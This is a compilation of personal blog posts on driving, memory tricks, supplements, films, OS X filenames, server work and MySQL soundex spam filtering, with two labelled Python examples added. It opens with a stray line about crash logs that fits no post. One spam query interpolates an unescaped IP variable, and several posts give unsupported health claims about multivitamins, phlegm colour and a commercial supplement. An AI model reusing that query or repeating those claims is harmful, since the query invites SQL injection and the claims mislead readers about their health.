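A spread of unrelated last requests (.php, .jpg, .css) across crashes, as in this sample, is the pattern the post describes: the crash site is not tied to any one script.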
2 days ago I got in a little accident on I95. It was luckily very minor. It was around Gateway Blvd. northbound, and that place is always jammed around 6-7pm as many lanes merge into two. Anyway, first the guy in front of me slams on his brakes. Then I do and successfully stop before hitting him. Then I watch in my rear-view and see the guy behind me successfully stop ok.
At that point I'm like 'whew' and go on listening to my music. Then BAM, the guy behind me runs into me. It turns out a lady behind him hit his car which pushed it into mine. We all 3 pulled over and I didn't get any damage to my rear bumper. Neither did the guy behind me to his front bumper. We decided it was not enough to report it. I'm not sure what happened to his rear bumper, but the lady was apologizing profusely saying she had a baby in her car distracting her, etc. I said "is everyone ok?" and then took off. No point in increasing my insurance over this if everyone agrees to let it slide.
Anyhow, I95 sucks.
Here is a very heartwarming story about someone dedicating his life to help kids in Haiti.
I read this in The Homeless Voice, which is a great newspaper sold to support the homeless. The articles are all very inspiring and touching. It makes you realize how important someone, even a homeless person, can be. So it really saddens me to see on the website a story about teenagers beating a homeless man to death "for fun."
There is also a great little 'advertisement' in the newspaper. It shows a picture of someone resembling Jesus and holding a 'Will work for loaves and fishes' cardboard sign. On the top it reads:
How can you worship a homeless man on Sunday, and ignore one on Monday?
Indeed.
It was just pointed out to me that OS X is case insensitive:
Viraj-Alankars-Computer:~/a virajalankar$ ls -l
total 0
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 a.txt
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 b.txt
Viraj-Alankars-Computer:~/a virajalankar$ mv b.txt A.txt
Viraj-Alankars-Computer:~/a virajalankar$ ls -l
total 0
-rw-r--r-- 1 virajala virajala 0 11 Sep 09:31 A.txt
Hmm, that seems kinda dangerous doesn't it?
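The overwrite in the session above happens for any two names that differ only in case, which matters when unpacking an archive or checking out a repository onto such a volume. The following is an added example, not part of the original post: it flags colliding names before they are written, and its fold() helper (Unicode NFD plus casefold) is an assumed approximation of the volume's real comparison rules.

```python
"""Find names that would collide on a case-insensitive filesystem."""
import unicodedata
from collections import defaultdict
from pathlib import PurePosixPath


def fold(component):
    # Assumption: NFD + casefold approximates how the volume compares names.
    # Real filesystems use their own folding tables.
    return unicodedata.normalize('NFD', component).casefold()


def find_case_collisions(paths):
    """Return groups of relative paths that differ only by case.

    Every directory prefix is checked as well, so 'src/' vs 'SRC/' is
    reported in addition to the files beneath them.
    """
    seen = defaultdict(set)
    for path in paths:
        parts = PurePosixPath(path).parts
        for depth in range(1, len(parts) + 1):
            prefix = parts[:depth]
            key = tuple(fold(part) for part in prefix)
            seen[key].add('/'.join(prefix))
    return sorted(sorted(names) for names in seen.values() if len(names) > 1)


def would_clobber(existing_names, destination):
    """Return the existing name that a rename to `destination` replaces.

    Returns None when no differently-spelled name folds to the same key.
    """
    target = fold(destination)
    for name in existing_names:
        if name != destination and fold(name) == target:
            return name
    return None


if __name__ == '__main__':
    # The directory from the session above: renaming b.txt to A.txt.
    print(would_clobber(['a.txt', 'b.txt'], 'A.txt'))
    # Constructed member list, e.g. from an archive about to be unpacked.
    members = ['a.txt', 'b.txt', 'A.txt', 'src/Makefile', 'SRC/makefile',
               'docs/readme']
    for group in find_case_collisions(members):
        print('collision:', ', '.join(group))
```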
I saw a BBC documentary about the brain and they were talking with one person who had incredible memory skills. They would shuffle 20 decks of cards, have him look through the decks, and then ask him to recite every card in each deck in order. Of course he was able to do it, but how?
It turns out his method involved first some preparation. He took a walking trip around the city and got into his mind certain locations and monuments. Then he associated each card with some object, say a queen of spades being a dog. He then created a story that described him walking around the city and seeing strange happenings with his cast of characters. The weirder the scenario is, the easier it is to remember. The location aspect makes a big difference, because his storyline proceeds as he walks through the city.
Another person had to memorize a list of unrelated words, and imagined themselves walking through their house seeing all of these strange objects that were or were related to the words he needed to remember.
There are all sorts of memorizing tricks, but the storyline and location method was new to me. I decided to try it for my first Biodiversity exam. It works, and I'm pretty sure I got a 100% on the exam. This class is pretty much rote memorization of phylums, species, and what not. For some of the sections I just created a very weird scene in my head. Others I created a ridiculous story. Either method would have images that would 'hint' at what needs to be remembered. Let's go through an example.
First here is a small section of notes that I needed to remember:
Phylum Pyrrophyta - Also called dinoflagellates
- Chlorophyll A+C
- 2 flagella
- cellulose cell wall
- Pfiesteria is an example genus
- These organisms cause red tides
- zooxanthellae are the organisms in corals
- some exhibit bioluminescence
Here is the 'story' that I used to remember this:
A pyromaniac with 2 whips was very fiesty and was walled up in a zoo. He drew blood from zoo animals to supply energy to his glowing coral necklace. He was cadaverized by a dinosaur.
This is absolute rubbish. The main point is to not so much memorizing the wording, but the imagery. Once you get the crazy images in your head, the words will come. Then these words are hints towards what is really needed to be remembered. The word pyromaniac is linked to pyrrophyta. The fact that he was killed by a dinosaur gives rise to 'dinoflagellates.' His 2 whips mean 2 flagella. The term 'cadaverized' is used to remember chlorophyll C (A is common to all of the plant-like phylums on this test, so there was no need to incorporate this extra info in the story). The mention of 'zoo' relates to zooxanthellae, and the 'glowing' to bioluminescence. 'Blood' refers to red tides. 'Fiesty' to pfiesteria, and so on.
Obviously there is a language that needs to be applied here, and it is nonsensical. The crazier it is, the easier it is to remember. I of course need to know something about the topic, and be able to induce 'zooxanthellae' from 'zoo', but that's just vocabulary you will already have from reading. There is no silver bullet to memorizing, but different techniques can be applied at different places, depending on what makes sense (or nonsense) to you.
This is just one example, I also used much more complicated storylines that incorporated many pages of notes to remember. In the end the stories were much shorter than my actual notes, so there is a condensing effect. The stories were so wild and were easy to remember the imagery. Things like Smurfette from The Smurfs swimming in slime (representing a fungus-like slime mold organism). On the test, when I saw keywords in the question, they reminded me of the different parts in my story, and from there I was able to get the answer. It takes a lot of work though, but I find coming up with the weird stories kinda fun. I will need to work at it more to sharpen my storymaking skills.
So I'm browsing through Discover magazine and notice an advertisement for Juvenon, supposedly an anti-aging drug. I decided to do some more reading into it. I've been reading a lot about cognitive enhancement drugs, and also trying some, and a common theme about these drugs is they offer some sort of anti-aging, anti-cancer, anti-epileptic, or anti-Alzheimer's disease effects. I would not be surprised if anti-aging drugs are actually cognitive enhancers as well. They are ultimately affecting cells, including neurons.
Juvenon was developed by a biochemist named Bruce Ames. Here is a highly respected person, who also created a widely used test to identify cancer-causing substances, now developing an anti-aging drug. After doing some more reading, this does not look like quack technology, and is based on sound studies. Here is an interesting quote from one of the articles linked above:
In his lab, he and his colleagues have been systematically depriving human cells of one essential nutrient after another and then looking to see what happens. What they've observed isn't pretty. When cells fall short on any one of a handful of nutrients that have been tested so far, Ames has discovered symptoms of severe genetic damage - the kinds of mutations in DNA that are believed to lead to cancer. Nutrient deficiencies also appear to disrupt the function of mitochondria - the tiny organs that provide cells with fuel. The result: premature aging of cells.
What they are essentially saying is a lack of nutrients can result in cancer. Ames attacks current diets of most Americans, stating that we do not get the proper nutrients. You are doing yourself a disservice if you do not take a multivitamin daily. I agree with that completely. You are literally what you eat. If you are not taking vitamins, go buy some. Most are water-soluble, so any 'extra' nutrients would be removed by the kidneys. It's insurance for your body.
I'm fascinated with mitochondria. These are small organelles within each cell that have an evolutionary origin of bacterial cells. It is supposed that at some point, these mitochondrial bacteria came into the animal cells and an endosymbiosis took place. They even have their own DNA and replicate on their own. This machinery supplies 98% of the energy for our cells. So the familiar ancestral evolutionary tree sort of breaks down, and rather you have separate organisms fusing into one. I find that pretty amazing.
So what is this Juvenon? First of all the proceeds for selling the drug claim to support research on the drug, and there is no profit for Ames in this. That is the claim anyhow. Juvenon is a combination of Acetyl-L-Carnitine and Alpha Lipoic Acid. There has been a lot of research on both of these, and there are positive effects. Essentially, carnitine is required for mitochondria function, and ALA is like a catalytic converter. Mitochondria release free radicals when functioning properly, and even more so when given carnitine. ALA acts to remove those. The goal of Juvenon is to keep these mitochondria in top condition, avoiding deterioration.
My opinion? It can't hurt to try. The fact that this was created by a well-respected biochemist gives it some credibility. There are some good interviews with Ames and he gives very good advice. I've ordered a bottle of this and will see if I notice any effects.
For a funny anti-Juvenon critique, check here.
Here's an interesting critique on how New Orleans is being handled. Warning, article tilts a bit towards the left.
If there was ever a director that made me feel like I was at the location where the film took place, it is Fernando Meirelles. I was blown away by City of God, and when I saw the previews for The Constant Gardener mentioning it was directed by the same person, I had to see it as soon as it came out.
Well I saw it tonight and am amazed. The amount of energy the film conveys is just mesmerizing. You feel like you are in the heart of Africa. This director makes a lot of use of contrast, and there are some great scenes of beautiful dinner parties or golf resorts, and then the slum and chaos just a few inches away. The use of color in this film is really well done and enforces this contrast.
It's a very dark, romantic, and suspenseful film about a not-so-nice pharmaceutical industry. It's rare a film could make me cry, but this one definitely gave me some tears. It was just beautifully done and is everything a movie should be. The story is not difficult to believe, and makes you really wonder. Go see it!
One thing that you invariably see in university life is the latest fashions. It's sort of an experimental petri dish for the weirdest and sometimes sexiest stuff. As far as the girls, I don't think I've seen one girl without a tattoo on the small of her back, and bare midriffs are the norm. Also t-shirts with quotes such as "All guys want a blonde" written on them in big letters seems to be 'in'. I must say I am having trouble keeping my concentration.
I remember seeing one guy in the library wearing about 10 watches on his arm and some weird red and black clothing with Slipknot written all over. I thought it would be kinda funny to ask him for the time, but held back. Anyway I wondered what this band Slipknot was about. Then I heard Duality on the radio, and man this group kicks ass. How can I not love a song with a chorus of "All I've got...all I've got is insane..."?. I had to buy some tunes on iTunes. It's very hard metal, and listening to that song in the morning at 6:30am is like a shot of adrenaline for me. I blast it in my car and most people are like WTF is that noise.
I have pretty strange tastes in music. I go from really lame teenage love songs to hiphop to mind numbing metal depending on my mood. Actually, it's usually the music that determines my mood so I have to be careful what I listen to!
Well I've been sick for the past few days. I think it's just a bad cold I got while travelling with little sleep. All of this medical technology and still no cure for the common cold.
Some phlegm advice:
Always check the phlegm color. If it's clear, white, or pale, the infection may still be viral, and antibiotics may not be necessary. If it's yellow, green, brown, or bloody, or if you are having fevers, chills, chest pains, or have other health problems, you might need antibiotics. Contact your health care delivery person.
Only Wes Craven could make a movie with a villain that wears a scarf and is still scary. This is just a fun movie, that's not afraid to make fun of itself. It keeps you on the edge of your seat, and seemed to me like a fast-paced Alfred Hitchcock flick.
The bad guy is the same dude who played the villain in Batman Begins. I thought he acted well in that movie as well as this one. I think he will be playing a lot of psychopaths in the future. Wes Craven seems to like humiliating the villain when it's their turn to pay, almost to the point of absurdity. This gets the audience quite worked up, and cheering at the end.
A big difference from Nightmare on Elm Street et al, the woman hero in this really kicks some ass. It's interesting how women's roles have changed in horror and action movies.
Recently saw a Flintstones vitamins commercial that mentioned their product now contains choline. This is an interesting drug that is mentioned in the Smart Drugs book. I find it interesting that this had been added to childrens' vitamins. It is found naturally in various foods.
Choline has a lot of good properties to it, but one side effect is taking it as a supplement can cause a fishy odor. So if your child starts smelling like tuna and he/she is taking Flintstones or something else with choline, might wanna reconsider. Granted you need a large dose, but children probably will need a smaller dose. What's strange is I don't even see the amount of choline ingredient on their web site.
Very interesting article on health insurance.
So I'm hearing on the news about yet another court case where the defendant claims he killed because of too many hours playing Grand Theft Auto. Now there is some new game called Bully coming out (by Rockstar of course) that is reminiscent of Columbine.
How come no one claims in court that "Fox News made me do it" or "CNN made me do it"? I wonder if the news stations would even report such things. Honestly I'm finding network news more and more despicable. It's filled with bad actors, unbelievably happy about stupid news, and overly serious about bad news. It is just so stupid and fake how news anchors try to convey their emotions in a patronizing way. Everyone seems like lapdogs trying to gather attention from viewers, and it is just sickening to my stomach every time I turn on the television. I'd like to see their IQ numbers scrolling across the bottom of the screen.
I know these anchors just want their paycheck and to go home. Whatever happened to real journalism? I'm wondering who are the Dan Rathers of today. Who is worthy of a day long remembrance by all news stations when he/she dies? Would you honestly give a shit if any of these CNN or other station's news anchors died?
I have a very cool Anatomy & Physiology professor named Dr. Curless. He's an old burly guy with a good sense of humor. Here is a cool extra credit option on his syllabus:
If you complete a martial arts course this semester on or off campus and provide documented evidence, signed by the instructor that you did so, 10 points will be added to your overall sum of points before semester average is calculated.
If you complete a rigorous physical fitness course this semester, on or off campus, and provide documented evidence of such, 5 points will be added to our sum of points before the semester average is calculated
Basically he wants students to be in shape and be able to defend themselves. He gave an example of going to elementary school and seeing most kids looking like the Michelin man.
It's true, kids these days are out of shape, and eating crap. In fact one of his points on the syllabus on how to do good in the class: Eat well. He also said that you will do bad unless you form study groups. The reasoning is that there are a lot of notes, and students will not be able to take all of them and their mind will wander occasionally. The purpose of study groups is to fill those holes in your notes. This is all very good advice. You get to meet cool people, and for me at least, the best way to learn something is to teach it.
As a computer science student, I did everything mostly on my own. I was a loner and got A's. The nature of computer studies is that you do most of the work alone. That's kinda sad in my opinion, and colleges should encourage more group work. When you get an IT job, it's rare you are working alone, so why not teach the courses that way?
A student pointed me to this useful site that provides ratings by students of professors for many major colleges.
Arrived back from CA Monday morning on the red eye flight. Had planned to go directly to school from there as it was the first day of the semester, but was too tired and missed 2 classes. Oh well, first day, can't be much going on.
Here are the courses I'm taking, as well as grades of my last semester. I did pretty good, but this semester will be a lot tougher with more credits. FAU is extremely crowded, with a lot of freshmen (and freshwomen).
They opened up a Starbucks on campus and man are they going to make a lot of money. I even succumbed and bought a frappuccino.
CA was great, the weather is cool (60-65 F). Build a city on a mountain and that's pretty much what San Fran looks like. I can't believe how steep the roads are. I remember walking outside in the morning and not noticing anyone jogging or anything which seemed weird to me. But then after a few minutes of walking uphill, I realized why. That is extremely tiring.
Some roads are so steep, that buses aren't supposed to go on them or else they'll get stuck when the road becomes level again. Guess what, I saw a bus get stuck, and it was pretty hilarious. There is a huge Chinatown and I didn't realize there were so many orientals in San Fran. Columbus and Broadway is the scene for night life and it was definitely cool to hang out there. There is always something to do and people to meet in the city. The lifestyle is so different from FL. People are so isolated here, but in big cities there is a lot more social interaction and mostly friendly people which is very cool.
I met up with Prashant and a buddy of his, as well as hung out with some others attending the wedding. We had a great time going around the city. The wedding was also fun. It's the first Jewish wedding I've been to, and was definitely an interesting experience. We did a lot of dancing.
I have a short vacation this weekend and am now sitting in the Fort Lauderdale airport waiting for a plane to San Francisco, CA. I'm going to attend a friend's wedding. Should be fun, and I heard the weather there is 65-70 F. This summer in FL is extremely hot, sometimes in the 100s! These summers are getting hotter and hotter. Maybe we need some more pollution to cool things down. Anyhow, I got so caught up in it I was originally packing shorts and t-shirts for CA. Luckily I checked the weather and then packed some warmer clothes.
I'll most likely catch up with Prashant there and will see what he is up to. I come back on Monday, and have to go straight from the airport to school. That's gonna be a loooong day. I'm bringing some Melatonin pills to hopefully help adjust to the time shift.
... they pull me back in. That's a line from Godfather 3, which sucked. It's the only line I like in the movie.
For the past few days I did a consulting gig. The task was to move a very busy site from one server to a load balancing setup with 2 servers. When I say busy, I mean about 280 requests per second... per SECOND! I am constantly amazed at what Linux and Apache can handle.
The site was generating about 2gigs of logfiles per day. Part of the task was to combine web statistics from both of the servers into one report. awstats was being used for log analysis, and it was taking on the order of 4-5 hours to process a day's log. Plus the database it creates itself was very big (about 200megs), and whenever someone would access the awstats CGI, it would take about a minute to load, killing the CPU in the process.
I set up the load balancer (hosted by Rackspace), configured the web servers to mirror each other, and wrote a script to combine logs together for awstats with the logresolvemerge.pl tool. It seems to work pretty well, and analyzing 2 separate smaller logfiles is actually quite a bit faster (1-2 hours). I also made awstats generate static pages instead of running as a CGI, which reduced load quite a bit. Apache has a pretty cool server status module (especially with the ExtendedStatus option), which shows in realtime how the server is doing, requests per second, etc.
How did we go from '
' to this:
I had no idea the Beatles made such a violent song. This is hilarious.
I found this really fascinating. It's a hair cell taken from a human ear, and it dances to music. Many of them put together is how we hear.
Humans are diploid, meaning that we have 2 sets of chromosomes, one from each parent. We also have haploid cells, such as sperm and ovum, which have only 1 set. The fusion is what creates a person.
In Biology class we learned about parthenogenesis, which is essentially self-fertilization in the female without requirement of a male. In fact the Greek roots of the word mean "virgin birth." When the teacher later asked what was parthenogenesis in a review, a student jokingly answered "immaculate conception."
Could Jesus have been born in such a way? Well for a child to be male, the Y chromosome must come from a male. If Mary was XX like most females, that wouldn't work. However, there is another scenario. There is the case of women like Jamie Lee Curtis, who are actually XY. That's normally reserved for males, but our teacher explained it as the Y chromosome pretty much being ignored by Jamie. But could there be self-fertilization in such a person?
Supposedly the answer is no. But maybe one day such a human will arise. It's not that far fetched, evolution can be surprising. Also, there are rumors that the Y chromosome, and men, are on their way out. Maybe we will become useless one day.
Update: I had originally said XXY was Turner syndrome in a female, but that's incorrect. XXY is Klinefelter syndrome in a male. X (just one) is Turner syndrome in a female.
My dad was telling me about people actually undergoing a tapeworm diet. Basically the idea is to ingest a tapeworm, and it will eat a lot of the food you do, thereby letting you eat without gaining much weight. Of course the worm could take away nutrients that you really need. When the patient wants to get off the diet, he/she ingests a pill that kills the tapeworm.
If you want to see some horrible worm infections in humans, follow this link. Warning, I suggest you not click on that if you are squeamish.
So I have all these AVI files of cool educational TV shows, and yesterday I wanted to be able to watch them on my plasma TV instead of my laptop. I used to be a big audiophile so I'm quite familiar with AV connections.
I have a Panasonic plasma that has a VGA input. I strolled to CompUSA and bought some connectors, and after some fiddling, am able to now watch movies played on my laptop on my TV. I'm very surprised at how clear it looks, and at 1024x768 the desktop is even usable. I now have an audio and VGA cable coming out of my TV system so either I or my brother can hook up our laptops. There is still a lot of remote control fiddling to get the right input settings, but no matter how much technology there is, you will still have 3 remote controls.
Then I thought, ok this is cool. But what I'd also like to do is make DVDs out of these AVIs in order to play them on a regular DVD player. One example is the show Anatomy for Beginners. I really want people to see this, and even wanted to give it to my biology professor to show to students. It's a good preparation to make sure students really want to get into medicine.
So began my foray into DVD burning on OS X. I thought it would be as simple as starting up this iDVD program on my dock that I've never started before. But of course it is never that easy. That program only lets you use Quicktime movies, I think. It didn't like my DivX AVIs that's for sure. I started searching around for free tools but the results I got were sort of like searching for Viagra: I got a shitload of useless results. Then I thought, maybe it'd be easier to do this on my Linux box. I searched the APT repositories for DVD creating tools but ended up needing countless dependencies for command line tools that would take me ages to learn.
Back to searching for OS X tools, and I came across ffmpegX, which claims to be a universal converter. After a lot of fiddling, I was able to make DVD .VOB files, which were then converted to a .DMG file, and then burned with OS X's Disk Utility app. That process took about 3 hours for a 50-minute show. When I went to play the DVD, the aspect ratio was changed from 16:9 to 4:3 for some reason. I'm sure that can be fixed, but shit, 3 hours for this process? Plus the app is all GUI, so it is not easy to script. Well I guess I could use Applescript.
Anyhow, it was an interesting experience, much more involved than I originally expected. I don't think I will be making a lot of DVDs.
Just a few hours after my post about my blog spam, I received what was pretty much an attack of 200 or so spam comments about online gambling. All of them were from different IPs, many cable modem IPs, so this tells me they are using bots of hijacked systems. All this for blog spam? And why do this on my blog? It's not like I get a lot of hits. I'm flattered guys.
So it was back to the drawing board. I'll describe my defenses because I'm more interested in being secure than obscure.
Since all the spam was from different IPs, I can't rely on that to identify the spammer. But I still liked my idea of using soundex functions to determine 'similar' spam. Now what I do is first compare the new comment coming in to all comments already in the database with a soundex match. If there is any comment that is similar already in the system, the new entry is rejected. This means that comments need to be essentially unique. Here is how to get a list of past comments and their number based on phonetic comparison if there are 5 or more matches:
SELECT soundex(comment_content) as a, count(*) as b
FROM $tablecomments WHERE soundex(comment_content) =
soundex('".$DB->escape($comment)."') GROUP BY a
HAVING b >= 5
ORDER BY b DESC
Actually my HAVING clause is currently using 1, which essentially returns results for any non-unique entries, but I can increase that number later if needed. HAVING and WHERE are different clauses: WHERE filters rows before grouping, while HAVING is applied after the GROUP BY is done and can refer to aliases.
b2evolution allows for a URL field for comments. This is being utilized by spammers as well as the comment data field. So I've added another defense. If a URL is posted more than 5 times in the last 24 hours, I reject. That might restrict people from posting more than 5 comments a day, but I don't expect that much anyway.
Here's a select query that shows comment URLs that have been posted more than 5 times in the last 24 hours:
SELECT comment_author_url as a, count(*) as b
FROM $tablecomments
WHERE comment_author_url = ".$DB->quote($url)."
AND length(comment_author_url) > 0
AND comment_date >= (now() - INTERVAL 24 HOUR)
GROUP BY a HAVING b >= 5
Note the special MySQL INTERVAL notation for date computations. It's very useful.
Well, we will see how long these defenses last. Bring it on.
The one thing that has always annoyed me on my Powerbook is the sleep light. This is a pulsating light that comes on when the Powerbook is closed and sleeping. It looks as though it is breathing, and is quite cool. In fact I've seen other laptops trying to emulate this, some like the Dells doing a stepwise decrease and increase in intensity that just looks crappy compared to the Powerbook.
But this light is annoying as hell. In a dark room it is so bright that it lights up the whole room. I honestly have to cover the light when I sleep. I wish there was a way to control the intensity but there doesn't seem to be.
I saw the latest Bill Murray movie Broken Flowers. From the previews it looked a lot like Lost in Translation. I didn't understand what the hype was over that movie. I didn't think it was that great.
Ebert gives Broken Flowers 4 stars. I don't really agree. The film is a meditation, very slow and lets its scenes settle in your stomach. It worked for a while, but then just got overdone. There are some very unique and funny scenes, but there is simply not enough to make this a great movie. Sometimes a movie just comes across as being pretentious, as if it is claiming to be worth more than it actually is. That's the way I felt about this movie. There are exceedingly long shots of boring details like cars driving. And the damn music was cool at first, but they kept playing the same song over and over as if they couldn't afford to purchase rights to more music.
However, there are some hilarious scenes. The Winston character was very touching in how much he tried to help, and the suggestion he was a reincarnation of a loyal dog was interesting. I especially like the scene where Murray goes and visits an old girlfriend (played by Sharon Stone) who has a daughter named Lolita. Lolita walks around the house naked trying to entice him. Boy that would be a tough household to live in.
Anyhow, you will either love it or hate it. It's supposed to be a thinking film, about philosophy and all that, but prepare to yawn a few times.
So I'm getting pounded by blog spam. I've had no time to attempt any coding to stop it due to school. Since my summer semester is over, I'll be trying a few hacks to reduce spam.
Seeing the spam I get, the comments all look the same, and they are just added to every one of my blog entries. So I thought, ok I'll just analyze the last comment that came from that IP. If it is the same length in characters, then I'll reject it. That was easy enough, since b2evolution is PHP and MySQL.
Then I noticed the MySQL soundex function. This does a phonetic algorithm to create a string. I thought why don't I use this to compare the new post to past posts.
I wanted to do most of it in MySQL since I hate PHP. That led me to figure out how to use variables to store data in MySQL. The following SQL statement would generate a soundex for the last comment posted and store it in the variable @sex:
SET @sex='';
SELECT (@sex:=soundex(comment_content))
FROM $tablecomments
WHERE comment_author_IP = '$user_ip' ORDER BY
comment_date DESC LIMIT 1
Then I compare this sex variable with the new comment coming in:
SELECT @sex = soundex('".$DB->escape($comment)."')
If that returns 1, then the soundexes match. Not the greatest spam protection in the world, but hey at least it's something. I know that by writing this post the spammers can easily bypass this. Go ahead you bastards, it will give me something to work on.
Update: So it seems I have instigated a fight. I'm being bombarded with spam now, all from different IPs. I'll have to do a little security through obscurity now...
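The three checks from this post and from the follow-up post about the 200-comment attack (last comment from the same IP, any stored comment with the same soundex, and a URL seen 5 or more times in 24 hours), combined in one place as an added example that is not the blog's own code. Assumptions: an in-memory SQLite table named comments stands in for $tablecomments, the Python soundex() only approximates MySQL's SOUNDEX(), all rows, IPs and URLs are constructed, and bound parameters replace the $DB->escape/$DB->quote string-building.

```python
import re
import sqlite3
from datetime import datetime, timedelta

NOW = datetime(2005, 8, 10, 12, 0, 0)  # constructed "current time" for the demo

# Soundex digit classes; vowels, H, W and Y carry no digit.
_CODES = {ch: d for d, group in (("1", "BFPV"), ("2", "CGJKQSXZ"), ("3", "DT"),
                                 ("4", "L"), ("5", "MN"), ("6", "R")) for ch in group}


def soundex(text):
    """Simplified whole-string Soundex (assumption: approximates MySQL's
    SOUNDEX(), which skips non-letters and is not cut to 4 characters)."""
    letters = re.sub(r"[^A-Z]", "", (text or "").upper())
    if not letters:
        return ""
    out, prev = [letters[0]], _CODES.get(letters[0], "")
    for ch in letters[1:]:
        digit = _CODES.get(ch, "")
        if digit and digit != prev:
            out.append(digit)
        if ch not in "HW":  # H and W do not separate equal codes
            prev = digit
    return "".join(out).ljust(4, "0")


def _ts(dt):
    """Timestamps are stored as sortable text, so >= works as a date test."""
    return dt.strftime("%Y-%m-%d %H:%M:%S")


def build_demo_db():
    """In-memory stand-in for the comments table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("soundex", 1, soundex)
    conn.execute("CREATE TABLE comments (comment_content TEXT, comment_author_IP TEXT,"
                 " comment_author_url TEXT, comment_date TEXT)")
    spam_url = "http://casino.example/"
    rows = [("Great post, thanks for the awstats tip", "192.0.2.10", "", 72),
            ("Buy cheap pills at casino-online now!!!", "198.51.100.7", spam_url, 2),
            ("Win big at roulette", "198.51.100.8", spam_url, 3),
            ("Free poker chips today", "198.51.100.9", spam_url, 4),
            ("Best blackjack odds", "198.51.100.10", spam_url, 5),
            ("Slots jackpot waiting", "198.51.100.11", spam_url, 6)]
    conn.executemany(
        "INSERT INTO comments VALUES (?, ?, ?, ?)",
        [(c, ip, url, _ts(NOW - timedelta(hours=h))) for c, ip, url, h in rows])
    return conn


def matches_last_from_ip(conn, ip, comment):
    """Original check: does the new comment sound like this IP's last one?"""
    row = conn.execute(
        "SELECT soundex(comment_content) = soundex(?) FROM comments"
        " WHERE comment_author_IP = ? ORDER BY comment_date DESC LIMIT 1",
        (comment, ip)).fetchone()
    return bool(row and row[0])


def similar_count(conn, comment):
    """Follow-up check: stored comments with the same soundex, from any IP."""
    return conn.execute(
        "SELECT count(*) FROM comments"
        " WHERE soundex(comment_content) = soundex(?)", (comment,)).fetchone()[0]


def url_count_24h(conn, url, now):
    """How often this author URL was posted in the 24 hours before `now`."""
    return conn.execute(
        "SELECT count(*) FROM comments WHERE comment_author_url = ?"
        " AND length(comment_author_url) > 0 AND comment_date >= ?",
        (url, _ts(now - timedelta(hours=24)))).fetchone()[0]


def accept(conn, ip, url, comment, now, max_similar=1, max_url=5):
    """Return (accepted, reason); the thresholds mirror the HAVING values in the posts."""
    if matches_last_from_ip(conn, ip, comment):
        return False, "same as last comment from this IP"
    if similar_count(conn, comment) >= max_similar:
        return False, "similar comment already stored"
    if url and url_count_24h(conn, url, now) >= max_url:
        return False, "URL posted too often in 24h"
    return True, "ok"


if __name__ == "__main__":
    db = build_demo_db()
    print(accept(db, "203.0.113.5", "", "buy CHEAP pills at casino online now", NOW))
    print(accept(db, "192.0.2.10", "", "I had the same problem with logresolvemerge", NOW))
```

Because soundex drops vowels, case and punctuation, the re-cased, re-punctuated copy of the stored spam comment is rejected even though it comes from a new IP.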
I saw on CNN that children are now playing a choking game. Basically, the idea is to cut off blood supply to your brain for fun. I gotta hand it to the kids, they sure are coming up with new ideas. Can't we go back to the good old days of 13 year olds having orgies?
I got ahold of videos of the show Anatomy for Beginners. I believe it plays in the UK. Basically it is a full live human dissection in front of an audience, with very closeup cameras. You'll need a pretty strong stomach to watch this. What I found really interesting is when they took a frozen brain and put it in a slicing machine to show the internal structures. They could not use the real brain because the consistency is like jelly.
I was really impressed with the production quality of the whole thing. The person doing the dissection is highly skilled and did it blazingly fast. It is really amazing, and if you can get ahold of a copy I highly recommend it.
Here is a picture of the ocean on fire:

Yes, on fire! Imagine swimming in that. It's the result of methane gas being pumped from the bottom of the ocean.
I saw an interesting BBC show about Global Dimming. It started out with an interesting observation. After the 9/11 attack, virtually all planes were grounded for 3 days. During that time, temperature rose around the US by about 1 degree Celsius. Doesn't sound like much but to climate scientists, it's a lot.
It had to do with airplane contrails not existing. The idea of global dimming is that pollution (in terms of particles) basically causes reflection of sunlight back out of the atmosphere. It reduces the temperature. It has other implications such as affecting rain/monsoon bands, and they say it was the cause of major drought in Ethiopia (and eventually the many deaths and save-an-Ethiopian commercials). If this were to affect monsoon bands in Asia, we are talking billions of people being affected.
What I find even more interesting is that global dimming offsets global warming. Countries that reduce pollution increase the effects of global warming. Scientists are saying that if we eliminate global dimming without reducing global warming as well, in 20 years temperature would rise 10 degrees Celsius. That basically means goodbye Florida and many other lowland areas due to glaciers melting and oceans rising.
So is the answer to just pump more pollutants to offset global warming? The problem with that is the pollutants are not very good for humans to breathe. Rain bands would also be affected, and the consequences of that are huge.
Murderball is best described as full-contact rugby for quadriplegics in Mad Max-style wheelchairs. I thought this movie would be lame until I read the reviews and saw the awards it won. I honestly expected a tearjerker, but was pleasantly surprised.
This is a documentary that is simply amazing. It is a very touching and inspirational film which portrays the quadriplegics in a light you normally do not see them in. These guys are badass, and can probably kick most normal people's asses. In the opening scene, you see a very tough quadriplegic putting on his own shorts, and from the beginning you realize what obstacles these people go through every day that we take for granted. It brings you into their world without compromise, and the direction is just top notch for a documentary.
I guarantee you will think twice about offering help to a quadriplegic after seeing this. You may think you are helping them when in actuality you are patronizing them. People respond differently. Think if you were in a wheelchair. Would you want everyone feeling sorry for you?
The film is rated R, and it's not for children. Some of these guys are not 'nice', but the competition is all in good spirit. The Canada vs US suspense was real. I really liked how they intercut the lives of the players with the game. There is a rather amazing scene where a doctor explains and demonstrates how to have quadriplegic sex. It's both sad and funny, because you realize that we all have basic human needs, quadriplegic or not.
One thing I really liked about this movie is using low budget techniques to do very cool stuff. When the quadriplegics are introduced, the camera zooms in on the back of their neck, which shows the scar of spine surgery. The film then blends to 3D pencil animations of the skeleton and the pins flying to be inserted in the spine. All done in a very slick and cool way. There are a lot of other things in the movie that show this director has some skill.
I saw this absolutely ridiculous contraption in Discover magazine and after reading "Exercise in exactly 4 minutes per day" I had to do a double take to see if the ad was a joke. I still don't know for sure.
What I do know is this contraption looks like some sort of torture device, and runs for the low price of $14,615. You would think they'd make a nice number like $14,600 or $14,599 but no, it's $14,615. Get yours now while supplies last.
What is very sad is people will actually buy this.
Here's a site that lists the best and worst cars for our atmosphere. Why not save the earth on your next car purchase? Or you could buy a Hummer.
I'm happy because I got a 96% on my 2nd Biological Principles exam. I was 3rd in my class of about 100. What's cool is the teacher pointed out all of us honor roll students in class. I like that because it gives a competitive edge to it and makes me want to be #1 next time. More teachers should be doing this.
Back when I did logarithms and 'e' in the past I really didn't see much practical use for them. Now that I've been out in the world, compound interest calculation is fun.
Let's say I invest $40k in a CD with compounding interest of 2%. What will I have in 5 years?
The formula is:
A = Pe^rt
^rt above means e raised to the 'rt' power
